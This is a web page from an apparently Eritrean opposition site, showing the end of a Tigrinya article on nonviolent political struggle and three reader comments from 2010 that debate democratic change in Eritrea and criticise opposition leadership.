ተሓንጊጡ ዝዓሉ ቦጦሎንታትን በራጊድን ክህሉ ምጽባይ ካብ ክውንነት ዝረሓቐ ትምኒት ከይከውን ምስትውዓል የድሊ። ንነገራት ምስ ፖለቲካዊ ክውንነትና ኣዛሚድና ክንርእዮ ይግባእ። ኣብ ርእሲዚ፡ ከምቲ ዝግባእ ስለ ዘይተሰርሓሉ ድኣ እምበር ዘይጎነጻዊ ኣገባብ ቃልሲ ኣድማዒ ስልታትን ኣገባባትን ከም ዘለዎ ምርዳእ ውን ኣገዳሲ ኢዩ። ዘይሰርሕ ኮይኑ ዘይኮነስ ኣይሰራሕናሉን።

 

 


Comments 

  1. #3 ሻሎም
    2010-11-1507:33:28 እቲ መብዛሕቱ ክፋል ህዝቢ ኣብ ሃገሩ ለውጢ ከምጽእ ንኽይሳተፍ ቀንዲ ጸገም ኮይኑ ዘሎ ፡ እቶም ክንመርሕ ኢሎም ዝርኣዩ ሰባት ብቕዓት ይጎድሎም ኣሎ ፡፡
    ተኣማንነትን ክብረትን ዝጎደሎም ፤ ለውጢ ክብሃል ከሎ ጥውይውይን ምስምስን ዘብዝሑ ፡ ምስ ሰብ ናይ ምልዛብን ምስምማዕን ተኽእሎ ዝጎድሎም ፤ ብመገድና ወይ ሞት ኢሎም ዝነቕጹ መራሕቲ ክእለዩ ይግባእ ፡፡ እምበር ህዝቢ ቅኑዓትን ግዱሳትን ፤ ብሓቂ ንህዝብን ሃገርን ዝሓልዩ መራሕቲ ተዝረክብ ፤ ድሕር ኣይምበለን ፡፡
  2. #2 Gezae
    2010-11-1419:34:37 Part II
    However, if Kidan leaders can’t deal with the past, how can they deal with the present and the future democratic change in Eritrea?

    I believe these groups leaders are stuck in the past and can no longer lives for the present and the future. The undemocratic origins and practices [censored] the 60 and early 70 are still reflected on them.

    Kidan as an organization suffers from leaders for life and a lack [censored] democracy. Kidan has been largely absent from new and evolving forms [censored] social and political democratic activities, and has failed to renew its political discourse and to reach out to young democratic activists and other new political forces.

    Kidan's difficulties in adapting to new developments in Eritrean politics is reflected in its position [censored] modern democratic change in Eritrea in the so called WaEla and up-most result.

    Things do not change; we change.
    Henry David T[censored]au
  3. #1 Gezae
    2010-11-1419:33:32 Part I
    I understand that the basic feature [censored] democracy is its flexibility, its ability to depend on the constant and bloodless change [censored] political elites, change not chaotic, but based on strict and legitimate laws, compromises and mutual concessions.

    Therefore, democracy, if it is a real democracy, cannot experience revolution. I do not believe to change the system in Eritrea by violence/war in order to have Woyane type government, because democracy means to me a constant, evolutionary change, and flexibility is its general characteristic, and the futures [censored] Eritrean democracy a relatively new system [censored] government and political order.

Add comment

Your comments are as important as the article you are commenting on. Please enrich the discussion by avoiding personal attacks. We'll publish your comment, if it meets our criteria. تعليقاتك لا تقل اهمية عن المقال المكتوب اعلاه، فالرجاء اثراء النقاش بالابتعاد عن الاساءات الشخصية. سوف ننشر تعليقك اذا استوف شروط النشر



Security code
Refresh

Enough dictatorship

Get Adobe Flash player

Arkokabay Media -----> Poem

Get Adobe Flash player

مرض الرئيس الأريتري بين الشائعة والنفي

Get Adobe Flash player

ALIA GABRES- SHE COTTON SUMMER DRESSES

Get Adobe Flash player